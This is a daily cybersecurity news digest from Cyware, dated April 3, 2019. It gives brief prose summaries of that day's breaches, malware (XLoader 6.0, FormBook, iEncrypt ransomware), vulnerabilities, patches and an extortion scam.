Go to listing page

Cyware Daily Threat Intelligence, April 03, 2019

Cyware Daily Threat Intelligence, April 03, 2019

Share Blog Post

Cybercriminals are actively using legitimate apps to conceal malware and launch devastating attacks for stealing sensitive data and performing other nefarious activities. In a recent cybersecurity incident, security researchers detected a new version of XLoader spyware that poses as fake banking apps for propagation into Android devices. Dubbed as XLoader 6.0, the spyware does not spare even the iPhone users. It uses a malicious iOS profile to infect iPhone and iPad devices. The malware, once installed, is capable of exfiltrating a device’s data such as the Unique device identifier (UDID), International Mobile Equipment Identity (IMEI), Integrated Circuit Card ID (ICCID), Mobile equipment identifier (MEID), Version number, and the Product number.     

The past 24 hours also saw the emergence of a massive email spam campaign that was used to compromise more than five million unique credentials. The campaign had occurred between March 8 and March 18, 2019 and involved spammers sending phishing emails with a link to a fake site regarding a weight loss pill or a bitcoin scam. The campaign was detected after security researchers came across a poorly configured database that had these stolen credentials.

New details regarding the ransomware attack on Arizona Beverages have surfaced lately. The beverage supplier company, which suffered the attack last month, is still working on restoring its computers and servers. The attack had affected more than 200 servers & networked computers, leaving the company with a very less chance to retrieve lost data.     
Top Breaches Reported in the Last 24 Hours

Arizona Beverages hit by iEncrypt ransomware
Arizona Beverages, the largest beverage suppliers in the US, suffered a slow down in operation after it was hit by an iEncrypt ransomware in March. This attack had affected more than 200 servers and networked computers with the company shutting down its sales operation for days. With no backup data available, the company is finding it hard to restore its systems. It is still rebuilding its network almost two weeks after the attack hit.

Iranian hackers attack UK organizations
A new report has revealed that Iranian hackers were behind the attacks that were carried out against the UK Post Office and local government networks on December 23, 2018. The attacks had affected the personal details of thousands of employees. Further analysis indicates that these hackers are already targeting government agencies to gain intelligence and position themselves for future cyber operations.

Compromised HTTPS sites used to store malware
Cyber-criminals are using well-known hidden directories of HTTPS sites to serve and store malicious payloads. In one such instance, compromised WordPress and Joomla websites were found spreading Shade/Troldesh ransomware, coin miners, backdoors, redirectors, phishing pages, and other threats. The attackers supposedly had managed to gain access to these sites via outdated plugins/themes.

Top Malware Reported in the Last 24 Hours

XLoader 6.0
Security researchers have discovered a new variant of XLoader spyware that infects both Android and iPhone users. The malware variant, XLoader 6.0, disguises itself as a fake banking app to infect Android phone users, whereas it uses a fake iOS profile to target iPhone & iPad devices. XLoader 6.0 is capable of collecting device information such as the Unique device identifier (UDID), International Mobile Equipment Identity (IMEI), Integrated Circuit Card ID (ICCID), Mobile equipment identifier (MEID), Version number, and the Product number.

A massive email spam campaign
A misconfigured database containing over 5 million unique credentials has been discovered by a team of researchers. The database in question was left open to the public by hackers without any password protection. It is believed that the hackers behind the campaign had grabbed the credentials from UK-based users between March 8 and March 18, 2019.

FormBook malware
Bad actors have been caught using a new file hosting service to deliver FormBook info-stealer and other malware. The infecting chain begins with users receiving a phishing email that contains a malicious attachment. The attachment is actually an RTF document that exploits two vulnerabilities affecting Microsoft ActiveX and Equation Editor. If the RTF doc is opened, it redirects the victims to a website that host the Formbook malware.  
Top Vulnerabilities Reported in the Last 24 Hours

Vulnerable Vidimensio’s GPS watches
A security lapse has exposed thousands of Vidimensio’s GPS watches to being eavesdropped. The fault exists due to a poorly configured API that is shared by over 20 models of the GPS watches. The bug could allow threat actors to eavesdrop and track users’ locations, alter data stored on the API server, and issue various commands to users' watches. Vidimensio was notified about the issue in December 2017. However, the company failed to patch the issue. It was only in April 2018 that issue was patched by the manufacturers.

PoC for unpatched IE and Edge Web browsers released
A researcher has released a proof-of-concept (PoC) for a bypass vulnerability affecting Microsoft’s Internet Explorer and Edge web browsers. The vulnerability can be exploited by a malicious website opened in Internet Explorer and Edge Web browsers to collect potentially sensitive information from other sites. The sensitive information includes cookies, sessionIDs, usernames, passwords and OAUTH tokens.  

Updates for tiff released
Security updates for vulnerabilities affecting tiff have been released recently. The vulnerabilities are tracked as CVE-2016-5102 (buffer overflow vulnerability) and CVE-2019-6128 (memory corruption vulnerability). Affected users are advised to follow the SUSE recommended installation methods like YaST online_update or 'zypper patch'. Alternatively, they can run the command listed for their respective products.    

Top Scams Reported in the Last 24 Hours

CIA extortion scam
A new variant of CIA extortion scam has been spotted in the wild. The scam begins with users receiving emails that pretend to be from a CIA officer. The email states that the recipients are a part of an investigation that is linked with pornography and that they can wipe their information from the case files only by paying a fee. For this, the victims are required to click on a password-protected PDF that comes attached in the email. Once the attached PDF is opened, it prompts the recipient to enter the password from the email and later send $5000 to the enclosed bitcoin address.       


iranian hackers
formbook malware
memory corruption vulnerability
xloader 60
misconfigured database
compromised https sites

Posted on: April 03, 2019

More from Cyware

Stay updated on the security threat landscape and technology innovations at Cyware with our threat intelligence briefings and blogs.